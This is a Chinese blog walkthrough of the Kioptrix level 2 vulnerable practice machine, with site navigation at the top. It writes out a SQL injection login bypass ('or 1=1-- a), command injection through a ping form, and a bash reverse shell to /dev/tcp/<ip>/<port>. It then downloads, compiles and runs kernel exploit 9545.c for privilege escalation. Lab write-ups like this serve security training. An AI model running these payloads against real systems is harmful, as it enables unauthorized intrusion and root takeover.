WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

其它

关于博客

面试

杂谈

Kioptrix level 2

0x01 登录

给了一个登录框,看看网页源代码有没有提示

提示用administrator登录,那administrator应该是用户名,bp爆破一下没有结果,使用万能密码试试,成功登录

1
2
administrator
'or 1=1-- a

0x02 命令执行

进去之后是一个执行ping命令的地方,第一个想到的就是任意代码执行

尝试输入 127.0.0.1|ls /

得到回显,可以看到根目录下有passwd文件,而题目要求就是获取这个文件的内容

输入 127.0.0.1|cat /passwd,返回了一个空页面没有回显,猜测是否有字符被过滤,查看一下网页源代码127.0.0.1|cat pingit.php,得到了回显

发现就是一个很普通的命令执行,没有任何过滤,那应该是权限的问题,现在的用户权限太低所以不能读取文件,需要提权,首先要反弹一个shell回来,在服务器上监听端口,然后执行反弹shell的命令

1
127.0.0.1|bash -i >& /dev/tcp/<ip>/<port> 0>&1

反弹成功

0x03 提权

首先看看系统内核的版本

1
2
uname -a #查看系统内核
lsb_release -a #查看系统版本

可以看到系统的内核是2.6.9,系统版本是CentOS4.5,使用searchsploit搜索一下提权的exp

可以看到这个exp比较符合我们的要求,去下载下来试试

本来想写个shell然后直接用蚁剑上传exp进去但是没有写的权限..所以准备用wget下载

首先在自己的服务器上开一个http服务器

1
python -m SimpleHTTPServer 8080

然后在靶机上下载并编译,注意要在/tmp下载,别的地方没有写入权限

1
2
3
4
5
wget http://马赛克:8080/9545.c
cd /tmp
gcc -o exp 9545.c
chmod 777 exp
./exp

提权成功并获得key